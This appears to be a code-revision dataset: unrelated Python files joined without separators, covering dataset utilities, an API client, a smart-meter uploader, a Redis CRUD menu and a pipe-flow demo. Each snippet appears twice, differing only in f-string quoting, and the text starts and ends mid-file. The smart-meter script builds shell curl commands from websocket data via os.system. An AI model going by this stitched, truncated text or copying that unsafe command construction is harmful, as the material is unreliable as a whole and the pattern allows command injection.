= load_dataset("glue", "mnli", split="train") # mapping to align with label2id = {'CONTRADICTION': 0, 'NEUTRAL': 1, 'ENTAILMENT': 2} ds_aligned = ds.align_labels_with_mapping(label2id, "label") """ # Sanity checks if label_column not in self._data.column_names: raise ValueError(f"Column ({label_column}) not in table columns ({self._data.column_names}).") label_feature = self.features[label_column] if not isinstance(label_feature, ClassLabel): raise ValueError( f"Aligning labels with a mapping is only supported for {ClassLabel.__name__} column, and column {label_feature} is {type(label_feature).__name__}." ) # Sort input mapping by ID value to ensure the label names are aligned label2id = dict(sorted(label2id.items(), key=lambda item: item[1])) label_names = list(label2id.keys()) # Some label mappings use uppercase label names so we lowercase them during alignment label2id = {k.lower(): v for k, v in label2id.items()} int2str_function = label_feature.int2str def process_label_ids(batch): dset_label_names = [ int2str_function(label_id).lower() if label_id is not None else None for label_id in batch[label_column] ] batch[label_column] = [ label2id[label_name] if label_name is not None else None for label_name in dset_label_names ] return batch features = self.features.copy() features[label_column] = ClassLabel(num_classes=len(label_names), names=label_names) return self.map(process_label_ids, features=features, batched=True, desc="Aligning the labels") def concatenate_datasets( dsets: List[Dataset], info: Optional[Any] = None, split: Optional[Any] = None, axis: int = 0, ): """ Converts a list of :class:`Dataset` with the same schema into a single :class:`Dataset`. Args: dsets (:obj:`List[datasets.Dataset]`): List of Datasets to concatenate. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. axis (``{0, 1}``, default ``0``, meaning over rows): Axis to concatenate over, where ``0`` means over rows (vertically) and ``1`` means over columns (horizontally). .. versionadded:: 1.6.0 """ # Ignore datasets with no rows if any(dset.num_rows > 0 for dset in dsets): dsets = [dset for dset in dsets if dset.num_rows > 0] else: # Return first dataset if all datasets are empty return dsets[0] # Perform checks (and a potentional cast if axis=0) if axis == 0: _check_if_features_can_be_aligned([dset.features for dset in dsets]) else: if not all([dset.num_rows == dsets[0].num_rows for dset in dsets]): raise ValueError("Number of rows must match for all datasets") _check_column_names([col_name for dset in dsets for col_name in dset._data.column_names]) # Find common format or reset format format = dsets[0].format if any(dset.format != format for dset in dsets): format = {} logger.info("Some of the datasets have disparate format. Resetting the format of the concatenated dataset.") def apply_offset_to_indices_table(table, offset): if offset == 0: return table else: array = table["indices"] new_array = pc.add(array, pa.scalar(offset, type=pa.uint64())) return InMemoryTable.from_arrays([new_array], names=["indices"]) # Concatenate indices if they exist if any(dset._indices is not None for dset in dsets): if axis == 0: # Datasets with no indices tables are replaced with a dataset with an indices table in memory. # Applying an offset to an indices table also brings the table in memory. indices_tables = [] for i in range(len(dsets)): if dsets[i]._indices is None: dsets[i] = dsets[i].select(range(len(dsets[i]))) indices_tables.append(dsets[i]._indices) # An offset needs to be applied to the indices before concatenating offset = 0 for i in range(len(dsets)): indices_tables[i] = apply_offset_to_indices_table(indices_tables[i], offset) offset += len(dsets[i]._data) # Concatenate indices indices_tables = [t for t in indices_tables if len(t) > 0] if indices_tables: indices_table = concat_tables(indices_tables) else: indices_table = InMemoryTable.from_batches([], schema=pa.schema({"indices": pa.int64()})) else: if len(dsets) == 1: indices_table = dsets[0]._indices else: for i in range(len(dsets)): dsets[i] = dsets[i].flatten_indices() indices_table = None else: indices_table = None table = concat_tables([dset._data for dset in dsets], axis=axis) if axis == 0: features_list = _align_features([dset.features for dset in dsets]) else: features_list = [dset.features for dset in dsets] table = update_metadata_with_features(table, {k: v for features in features_list for k, v in features.items()}) # Concatenate infos if info is None: info = DatasetInfo.from_merge([dset.info for dset in dsets]) fingerprint = update_fingerprint( "".join(dset._fingerprint for dset in dsets), concatenate_datasets, {"info": info, "split": split} ) # Make final concatenated dataset concatenated_dataset = Dataset( table, info=info, split=split, indices_table=indices_table, fingerprint=fingerprint, ) concatenated_dataset.set_format(**format) return concatenated_dataset # This is outside Dataset.filter as it needs to be picklable for multiprocessing def get_indices_from_mask_function( function: Callable, batched: bool, with_indices: bool, input_columns: Optional[Union[str, List[str]]], indices_mapping: Optional[Table] = None, *args, **fn_kwargs, ): if batched: # we extract indices from args *inputs, indices = args if with_indices: mask = function(*inputs, indices, **fn_kwargs) else: mask = function(*inputs, **fn_kwargs) else: # we get batched data (to do less look-ups) but `function` only accepts one example # therefore we need to call `function` on each example of the batch to get the mask *inputs, indices = args mask = [] if input_columns is None: # inputs only contains a batch of examples batch: dict = inputs[0] num_examples = len(batch[next(iter(batch.keys()))]) for i in range(num_examples): example = {key: batch[key][i] for key in batch} mask.append( function(example, indices[i], **fn_kwargs) if with_indices else function(example, **fn_kwargs) ) else: # inputs is a list of columns columns: List[List[Any]] = inputs num_examples = len(columns[0]) for i in range(num_examples): input = [column[i] for column in columns] mask.append( function(*input, indices[i], **fn_kwargs) if with_indices else function(*input, **fn_kwargs) ) indices_array = [i for i, to_keep in zip(indices, mask) if to_keep] if indices_mapping is not None: indices_array = pa.array(indices_array, type=pa.uint64()) indices_array = indices_mapping.column(0).take(indices_array) indices_array = indices_array.to_pylist() return {"indices": indices_array}
import os from functools import lru_cache from typing import Any, Dict, Optional from dotenv import load_dotenv from requests import Session load_dotenv() hyperion_base_url = f"{os.getenv("HYPERION_ENDPOINT")}/api/v1" hyperion_session = Session() hyperion_session.headers.update( { "Authorization": f"Bearer {os.getenv("HYPERION_INTEGRATION_TOKEN")}", } ) currency_details = hyperion_session.get( f"{hyperion_base_url}/integration/currency" ).json() @lru_cache() def resolve_account_id(account_id: str) -> Optional[Dict[str, Any]]: account_resp = hyperion_session.get(f"{hyperion_base_url}/accounts/{account_id}") if account_resp.status_code == 404: return None return account_resp.json()
import os from functools import lru_cache from typing import Any, Dict, Optional from dotenv import load_dotenv from requests import Session load_dotenv() hyperion_base_url = f"{os.getenv('HYPERION_ENDPOINT')}/api/v1" hyperion_session = Session() hyperion_session.headers.update( { "Authorization": f"Bearer {os.getenv('HYPERION_INTEGRATION_TOKEN')}", } ) currency_details = hyperion_session.get( f"{hyperion_base_url}/integration/currency" ).json() @lru_cache() def resolve_account_id(account_id: str) -> Optional[Dict[str, Any]]: account_resp = hyperion_session.get(f"{hyperion_base_url}/accounts/{account_id}") if account_resp.status_code == 404: return None return account_resp.json()
#!/usr/bin/env python3 from logger import logger import asyncio import websockets import json from pathlib import Path import datetime import os RootDir = '/home/pi/chain2gate' DeviceId = 'c2g-XXXXXXXXX' ServerIP = 'XXX.XXX.XXX.XXX' ApiKey = 'API_KEY' def configure(): global DeviceId, RootDir, ServerIP, ApiKey with open(f"{RootDir}/settings.json", 'r') as jsonfile: settings = json.load(jsonfile) DeviceId = settings.get('DeviceId') ServerIP = settings.get('ServerIP') ApiKey = settings.get('ApiKey') def trim_dict(d): emax = max(d['epoch']) emin = min([e for e in d['epoch'] if e > emax - 60*60*24]) imin = d['epoch'].index(emin) d['epoch'] = d['epoch'][imin:] d['meter'] = d['meter'][imin:] d['type'] = d['type'][imin:] d['energy'] = d['energy'][imin:] d['power'] = d['power'][imin:] def load_json(): try: with open(f"{RootDir}/{DeviceId}.json", 'r') as jsonfile: d = json.load(jsonfile) except: d = { 'epoch': [], 'meter': [], 'type': [], 'energy': [], 'power': [] } return d def save_json(d): with open(f"{RootDir}/{DeviceId}.json", 'w') as jsonfile: json.dump(d, jsonfile) def upload(date=None): c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' if date is not None: c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}&date={date}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' logger.debug(f'Uploading: {c}') os.system(c) async def chain2client(): while True: # outer loop restarted every time the connection fails uri = f"ws://{DeviceId}.local:81" logger.debug(f'uri: {uri}') logger.debug('Reading data json file.') d = load_json() logger.debug('Read.') last_upload = datetime.datetime.now() try: async with websockets.connect(uri) as websocket: logger.info('Client started.') async for message in websocket: logger.debug('Message received.') msg = json.loads(message) now = datetime.datetime.now() if 'Chain2Data' in msg: logger.info(msg) msg_meter = msg['Chain2Data']['Meter'] msg_type = msg['Chain2Data']['Type'] msg_payload = msg['Chain2Data']['Payload'] msg_epoch = None msg_energy = None msg_power = None if msg_type == 'CF1': msg_epoch = msg_payload['MeasurePosixTimestamp'] msg_energy = msg_payload['TotalActEnergy'] if msg_type == 'CF21': msg_epoch = msg_payload['EventPosixTimestamp'] msg_power = msg_payload['InstantPower'] if msg_type in ['CF1', 'CF21']: d['epoch'].append(msg_epoch) d['meter'].append(msg_meter) d['type'].append(msg_type) d['energy'].append(msg_energy) d['power'].append(msg_power) if msg_type == 'CF1': trim_dict(d) logger.debug(f"Dictionary trimmed to {len(d["epoch"])}") save_json(d) logger.info('Json file updated.') upload() logger.info('Current data uploaded') if last_upload.date() < now.date(): upload(now.strftime("%Y%m%d")) logger.info(f'Daily data uploaded {now.strftime('%Y%m%d')}') last_upload = now if msg_type == 'CF1': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} energy={msg_energy} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending energy data to Influxdb') os.system(c) if msg_type == 'CF21': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} power={msg_power} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending power data to Influxdb') os.system(c) except: logger.error('Socket error - retrying connection in 10 sec (Ctrl-C to quit)') await asyncio.sleep(10) continue if __name__ == '__main__': logger.debug("Program started.") configure() logger.debug("Configuration completed.") asyncio.get_event_loop().run_until_complete(chain2client())
#!/usr/bin/env python3 from logger import logger import asyncio import websockets import json from pathlib import Path import datetime import os RootDir = '/home/pi/chain2gate' DeviceId = 'c2g-XXXXXXXXX' ServerIP = 'XXX.XXX.XXX.XXX' ApiKey = 'API_KEY' def configure(): global DeviceId, RootDir, ServerIP, ApiKey with open(f"{RootDir}/settings.json", 'r') as jsonfile: settings = json.load(jsonfile) DeviceId = settings.get('DeviceId') ServerIP = settings.get('ServerIP') ApiKey = settings.get('ApiKey') def trim_dict(d): emax = max(d['epoch']) emin = min([e for e in d['epoch'] if e > emax - 60*60*24]) imin = d['epoch'].index(emin) d['epoch'] = d['epoch'][imin:] d['meter'] = d['meter'][imin:] d['type'] = d['type'][imin:] d['energy'] = d['energy'][imin:] d['power'] = d['power'][imin:] def load_json(): try: with open(f"{RootDir}/{DeviceId}.json", 'r') as jsonfile: d = json.load(jsonfile) except: d = { 'epoch': [], 'meter': [], 'type': [], 'energy': [], 'power': [] } return d def save_json(d): with open(f"{RootDir}/{DeviceId}.json", 'w') as jsonfile: json.dump(d, jsonfile) def upload(date=None): c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' if date is not None: c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}&date={date}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' logger.debug(f'Uploading: {c}') os.system(c) async def chain2client(): while True: # outer loop restarted every time the connection fails uri = f"ws://{DeviceId}.local:81" logger.debug(f'uri: {uri}') logger.debug('Reading data json file.') d = load_json() logger.debug('Read.') last_upload = datetime.datetime.now() try: async with websockets.connect(uri) as websocket: logger.info('Client started.') async for message in websocket: logger.debug('Message received.') msg = json.loads(message) now = datetime.datetime.now() if 'Chain2Data' in msg: logger.info(msg) msg_meter = msg['Chain2Data']['Meter'] msg_type = msg['Chain2Data']['Type'] msg_payload = msg['Chain2Data']['Payload'] msg_epoch = None msg_energy = None msg_power = None if msg_type == 'CF1': msg_epoch = msg_payload['MeasurePosixTimestamp'] msg_energy = msg_payload['TotalActEnergy'] if msg_type == 'CF21': msg_epoch = msg_payload['EventPosixTimestamp'] msg_power = msg_payload['InstantPower'] if msg_type in ['CF1', 'CF21']: d['epoch'].append(msg_epoch) d['meter'].append(msg_meter) d['type'].append(msg_type) d['energy'].append(msg_energy) d['power'].append(msg_power) if msg_type == 'CF1': trim_dict(d) logger.debug(f"Dictionary trimmed to {len(d['epoch'])}") save_json(d) logger.info('Json file updated.') upload() logger.info('Current data uploaded') if last_upload.date() < now.date(): upload(now.strftime("%Y%m%d")) logger.info(f'Daily data uploaded {now.strftime("%Y%m%d")}') last_upload = now if msg_type == 'CF1': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} energy={msg_energy} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending energy data to Influxdb') os.system(c) if msg_type == 'CF21': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} power={msg_power} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending power data to Influxdb') os.system(c) except: logger.error('Socket error - retrying connection in 10 sec (Ctrl-C to quit)') await asyncio.sleep(10) continue if __name__ == '__main__': logger.debug("Program started.") configure() logger.debug("Configuration completed.") asyncio.get_event_loop().run_until_complete(chain2client())
import redis def testa_chave(chave): try: conn = conectar() dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos dados = str(dados) if chave in dados: return True else: return False except redis.exceptions.ConnectionError as e: print(f'Não foi possível testar a chave. {e}') def gera_id(): try: conn = conectar() # conecta chave = conn.get('chave') # pega a ultima chave, comando get if chave: chave = conn.incr('chave') # se a chave existir usa o comando incr do redis para incrementar return chave else: conn.set('chave', 1) # caso a chave não exista cadastra a primeira return 1 except redis.exceptions.ConnectionError as e: print(f'Não foi possível gerar a chave. {e}') def conectar(): """ Função para conectar ao servidor """ conn = redis.Redis(host='localhost', port=6379) return conn # É preciso habilitar a conexão def desconectar(conn): """ Função para desconectar do servidor. """ conn.connection_pool.disconnect() def listar(): """ Função para listar os produtos """ conn = conectar() try: dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos if len(dados) > 0: print('Listando produtos...') print('--------------------') for chave in dados: produto = conn.hgetall(chave) print(f"ID: {str(chave,"utf-8", "ignore")}") print(f"Produto: {str(produto[b"nome"],"utf-8", "ignore")}") print(f"Preço: {str(produto[b"preco"],"utf-8", "ignore")}") print(f"Estoque: {str(produto[b"estoque"],"utf-8", "ignore")}") print('--------------------') # Os dados vem em formato de string binária (por isso o b'variável'), por isso converte-se o dado em # utf-8, o ignore é pra ignorar erros que podem aparecer else: print('Não existem produtos cadastrados.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível listar os produtos. {e}') desconectar(conn) def inserir(): """ Função para inserir um produto """ conn = conectar() nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor # padrão seguido será produtos:cod(1,2,3...)) chave = f'produtos:{gera_id()}' try: res = conn.hmset(chave, produto) # lembrando hm pois são multiplos valores if res: print(f'O produto {nome} foi inserido com suscesso.') else: print('Não foi possível inserir o produto.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível inserir o produto. {e}') desconectar(conn) def atualizar(): """ Função para atualizar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor resposta = testa_chave(chave) if resposta: try: res = conn.hmset(chave, produto) if res: print(f'O produto {nome} foi atuaizado com sucesso.') # Nesse caso se a chave não existir ela sera criada, então não tem motivo para colocar o else, depois # adiciono uma função para não permitir isso, note que no momento a diferenã pro inserir é que a chave é # gerada e aqui é recebida # O programa foi atualizado, agora possui um fç que trata a chave, se ela existir da continuidade ao código # se não interrompe, portanto nã precisa do else except redis.exceptions.ConnectionError as e: print(f'Não foi possível atualizar o produto. {e}') else: print('Chave inexistente, confira a escrita.') desconectar(conn) def deletar(): """ Função para deletar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') try: res = conn.delete(chave) if res == 1: print('O produto foi deletado com sucesso.') else: print('Não existe produto com a chave informada.') except redis.exceptions.ConnectionError as e: print(f'Erro ao conectar ao redis. {e}') desconectar(conn) def menu(): """ Função para gerar o menu inicial """ print('=========Gerenciamento de Produtos==============') print('Selecione uma opção: ') print('1 - Listar produtos.') print('2 - Inserir produtos.') print('3 - Atualizar produto.') print('4 - Deletar produto.') opcao = int(input()) if opcao in [1, 2, 3, 4]: if opcao == 1: listar() elif opcao == 2: inserir() elif opcao == 3: atualizar() elif opcao == 4: deletar() else: print('Opção inválida') else: print('Opção inválida')
import redis def testa_chave(chave): try: conn = conectar() dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos dados = str(dados) if chave in dados: return True else: return False except redis.exceptions.ConnectionError as e: print(f'Não foi possível testar a chave. {e}') def gera_id(): try: conn = conectar() # conecta chave = conn.get('chave') # pega a ultima chave, comando get if chave: chave = conn.incr('chave') # se a chave existir usa o comando incr do redis para incrementar return chave else: conn.set('chave', 1) # caso a chave não exista cadastra a primeira return 1 except redis.exceptions.ConnectionError as e: print(f'Não foi possível gerar a chave. {e}') def conectar(): """ Função para conectar ao servidor """ conn = redis.Redis(host='localhost', port=6379) return conn # É preciso habilitar a conexão def desconectar(conn): """ Função para desconectar do servidor. """ conn.connection_pool.disconnect() def listar(): """ Função para listar os produtos """ conn = conectar() try: dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos if len(dados) > 0: print('Listando produtos...') print('--------------------') for chave in dados: produto = conn.hgetall(chave) print(f"ID: {str(chave,'utf-8', 'ignore')}") print(f"Produto: {str(produto[b'nome'],'utf-8', 'ignore')}") print(f"Preço: {str(produto[b'preco'],'utf-8', 'ignore')}") print(f"Estoque: {str(produto[b'estoque'],'utf-8', 'ignore')}") print('--------------------') # Os dados vem em formato de string binária (por isso o b'variável'), por isso converte-se o dado em # utf-8, o ignore é pra ignorar erros que podem aparecer else: print('Não existem produtos cadastrados.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível listar os produtos. {e}') desconectar(conn) def inserir(): """ Função para inserir um produto """ conn = conectar() nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor # padrão seguido será produtos:cod(1,2,3...)) chave = f'produtos:{gera_id()}' try: res = conn.hmset(chave, produto) # lembrando hm pois são multiplos valores if res: print(f'O produto {nome} foi inserido com suscesso.') else: print('Não foi possível inserir o produto.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível inserir o produto. {e}') desconectar(conn) def atualizar(): """ Função para atualizar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor resposta = testa_chave(chave) if resposta: try: res = conn.hmset(chave, produto) if res: print(f'O produto {nome} foi atuaizado com sucesso.') # Nesse caso se a chave não existir ela sera criada, então não tem motivo para colocar o else, depois # adiciono uma função para não permitir isso, note que no momento a diferenã pro inserir é que a chave é # gerada e aqui é recebida # O programa foi atualizado, agora possui um fç que trata a chave, se ela existir da continuidade ao código # se não interrompe, portanto nã precisa do else except redis.exceptions.ConnectionError as e: print(f'Não foi possível atualizar o produto. {e}') else: print('Chave inexistente, confira a escrita.') desconectar(conn) def deletar(): """ Função para deletar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') try: res = conn.delete(chave) if res == 1: print('O produto foi deletado com sucesso.') else: print('Não existe produto com a chave informada.') except redis.exceptions.ConnectionError as e: print(f'Erro ao conectar ao redis. {e}') desconectar(conn) def menu(): """ Função para gerar o menu inicial """ print('=========Gerenciamento de Produtos==============') print('Selecione uma opção: ') print('1 - Listar produtos.') print('2 - Inserir produtos.') print('3 - Atualizar produto.') print('4 - Deletar produto.') opcao = int(input()) if opcao in [1, 2, 3, 4]: if opcao == 1: listar() elif opcao == 2: inserir() elif opcao == 3: atualizar() elif opcao == 4: deletar() else: print('Opção inválida') else: print('Opção inválida')
""" DEMO 6 ------ Calculate flow coefficient and resistance coefficient of draw-off point from known flow rate and pressure drop. """ import quantities as qty from pypeflow.core.flow_coefficient import FlowCoefficient from pypeflow.core.resistance_coefficient import ResistanceCoefficient from pypeflow.core.pipe_schedules import PipeSchedule40 V = qty.VolumeFlowRate(0.29, 'L/s') dp = qty.Pressure(0.05, 'MPa') Kv = FlowCoefficient.calc_Kv(V, dp) print(f'flow coefficient = {Kv:.3f}') di = PipeSchedule40.inside_diameter(DN=qty.Length(15.0, 'mm')) print(f'inside diameter = {di('mm'):.3f} mm') zeta = ResistanceCoefficient.from_Kv(Kv, di) print(f'resistance coefficient = {zeta:.3f}')
""" DEMO 6 ------ Calculate flow coefficient and resistance coefficient of draw-off point from known flow rate and pressure drop. """ import quantities as qty from pypeflow.core.flow_coefficient import FlowCoefficient from pypeflow.core.resistance_coefficient import ResistanceCoefficient from pypeflow.core.pipe_schedules import PipeSchedule40 V = qty.VolumeFlowRate(0.29, 'L/s') dp = qty.Pressure(0.05, 'MPa') Kv = FlowCoefficient.calc_Kv(V, dp) print(f'flow coefficient = {Kv:.3f}') di = PipeSchedule40.inside_diameter(DN=qty.Length(15.0, 'mm')) print(f'inside diameter = {di("mm"):.3f} mm') zeta = ResistanceCoefficient.from_Kv(Kv, di) print(f'resistance coefficient = {zeta:.3f}')
# Copyright 2020 The Feast Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import enum import warnings from abc import ABC, abstractmethod from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union from google.protobuf.json_format import MessageToJson from feast import type_map from feast.data_format import StreamFormat from feast.field import Field from feast.protos.feast.core.DataSource_pb2 import DataSource as DataSourceProto from feast.repo_config import RepoConfig, get_data_source_class_from_type from feast.types import VALUE_TYPES_TO_FEAST_TYPES from feast.value_type import ValueType class SourceType(enum.Enum): """ DataSource value type. Used to define source types in DataSource. """ UNKNOWN = 0 BATCH_FILE = 1 BATCH_BIGQUERY = 2 STREAM_KAFKA = 3 STREAM_KINESIS = 4 BATCH_TRINO = 5 class KafkaOptions: """ DataSource Kafka options used to source features from Kafka messages """ def __init__( self, bootstrap_servers: str, message_format: StreamFormat, topic: str, ): self.bootstrap_servers = bootstrap_servers self.message_format = message_format self.topic = topic @classmethod def from_proto(cls, kafka_options_proto: DataSourceProto.KafkaOptions): """ Creates a KafkaOptions from a protobuf representation of a kafka option Args: kafka_options_proto: A protobuf representation of a DataSource Returns: Returns a BigQueryOptions object based on the kafka_options protobuf """ kafka_options = cls( bootstrap_servers=kafka_options_proto.bootstrap_servers, message_format=StreamFormat.from_proto(kafka_options_proto.message_format), topic=kafka_options_proto.topic, ) return kafka_options def to_proto(self) -> DataSourceProto.KafkaOptions: """ Converts an KafkaOptionsProto object to its protobuf representation. Returns: KafkaOptionsProto protobuf """ kafka_options_proto = DataSourceProto.KafkaOptions( bootstrap_servers=self.bootstrap_servers, message_format=self.message_format.to_proto(), topic=self.topic, ) return kafka_options_proto class KinesisOptions: """ DataSource Kinesis options used to source features from Kinesis records """ def __init__( self, record_format: StreamFormat, region: str, stream_name: str, ): self.record_format = record_format self.region = region self.stream_name = stream_name @classmethod def from_proto(cls, kinesis_options_proto: DataSourceProto.KinesisOptions): """ Creates a KinesisOptions from a protobuf representation of a kinesis option Args: kinesis_options_proto: A protobuf representation of a DataSource Returns: Returns a KinesisOptions object based on the kinesis_options protobuf """ kinesis_options = cls( record_format=StreamFormat.from_proto(kinesis_options_proto.record_format), region=kinesis_options_proto.region, stream_name=kinesis_options_proto.stream_name, ) return kinesis_options def to_proto(self) -> DataSourceProto.KinesisOptions: """ Converts an KinesisOptionsProto object to its protobuf representation. Returns: KinesisOptionsProto protobuf """ kinesis_options_proto = DataSourceProto.KinesisOptions( record_format=self.record_format.to_proto(), region=self.region, stream_name=self.stream_name, ) return kinesis_options_proto _DATA_SOURCE_OPTIONS = { DataSourceProto.SourceType.BATCH_FILE: "feast.infra.offline_stores.file_source.FileSource", DataSourceProto.SourceType.BATCH_BIGQUERY: "feast.infra.offline_stores.bigquery_source.BigQuerySource", DataSourceProto.SourceType.BATCH_REDSHIFT: "feast.infra.offline_stores.redshift_source.RedshiftSource", DataSourceProto.SourceType.BATCH_SNOWFLAKE: "feast.infra.offline_stores.snowflake_source.SnowflakeSource", DataSourceProto.SourceType.BATCH_TRINO: "feast.infra.offline_stores.contrib.trino_offline_store.trino_source.TrinoSource", DataSourceProto.SourceType.BATCH_SPARK: "feast.infra.offline_stores.contrib.spark_offline_store.spark_source.SparkSource", DataSourceProto.SourceType.STREAM_KAFKA: "feast.data_source.KafkaSource", DataSourceProto.SourceType.STREAM_KINESIS: "feast.data_source.KinesisSource", DataSourceProto.SourceType.REQUEST_SOURCE: "feast.data_source.RequestSource", DataSourceProto.SourceType.PUSH_SOURCE: "feast.data_source.PushSource", } class DataSource(ABC): """ DataSource that can be used to source features. Args: name: Name of data source, which should be unique within a project timestamp_field (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional) A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ name: str timestamp_field: str created_timestamp_column: str field_mapping: Dict[str, str] date_partition_column: str description: str tags: Dict[str, str] owner: str def __init__( self, *, event_timestamp_column: Optional[str] = None, created_timestamp_column: Optional[str] = None, field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", name: Optional[str] = None, timestamp_field: Optional[str] = None, ): """ Creates a DataSource object. Args: name: Name of data source, which should be unique within a project event_timestamp_column (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ if not name: warnings.warn( ( "Names for data sources need to be supplied. " "Data sources without names will not be supported after Feast 0.23." ), UserWarning, ) self.name = name or "" if not timestamp_field and event_timestamp_column: warnings.warn( ( "The argument 'event_timestamp_column' is being deprecated. Please use 'timestamp_field' instead. " "instead. Feast 0.23 and onwards will not support the argument 'event_timestamp_column' for datasources." ), DeprecationWarning, ) self.timestamp_field = timestamp_field or event_timestamp_column or "" self.created_timestamp_column = ( created_timestamp_column if created_timestamp_column else "" ) self.field_mapping = field_mapping if field_mapping else {} self.date_partition_column = ( date_partition_column if date_partition_column else "" ) self.description = description or "" self.tags = tags or {} self.owner = owner or "" def __hash__(self): return hash((self.name, self.timestamp_field)) def __str__(self): return str(MessageToJson(self.to_proto())) def __eq__(self, other): if other is None: return False if not isinstance(other, DataSource): raise TypeError("Comparisons should only involve DataSource class objects.") if ( self.name != other.name or self.timestamp_field != other.timestamp_field or self.created_timestamp_column != other.created_timestamp_column or self.field_mapping != other.field_mapping or self.date_partition_column != other.date_partition_column or self.description != other.description or self.tags != other.tags or self.owner != other.owner ): return False return True @staticmethod @abstractmethod def from_proto(data_source: DataSourceProto) -> Any: """ Converts data source config in protobuf spec to a DataSource class object. Args: data_source: A protobuf representation of a DataSource. Returns: A DataSource class object. Raises: ValueError: The type of DataSource could not be identified. """ data_source_type = data_source.type if not data_source_type or ( data_source_type not in list(_DATA_SOURCE_OPTIONS.keys()) + [DataSourceProto.SourceType.CUSTOM_SOURCE] ): raise ValueError("Could not identify the source type being added.") if data_source_type == DataSourceProto.SourceType.CUSTOM_SOURCE: cls = get_data_source_class_from_type(data_source.data_source_class_type) return cls.from_proto(data_source) cls = get_data_source_class_from_type(_DATA_SOURCE_OPTIONS[data_source_type]) return cls.from_proto(data_source) @abstractmethod def to_proto(self) -> DataSourceProto: """ Converts a DataSourceProto object to its protobuf representation. """ raise NotImplementedError def validate(self, config: RepoConfig): """ Validates the underlying data source. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError @staticmethod @abstractmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: """ Returns the callable method that returns Feast type given the raw column type. """ raise NotImplementedError def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: """ Returns the list of column names and raw column types. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError def get_table_query_string(self) -> str: """ Returns a string that can directly be used to reference this table in SQL. """ raise NotImplementedError class KafkaSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __init__( self, *args, name: Optional[str] = None, 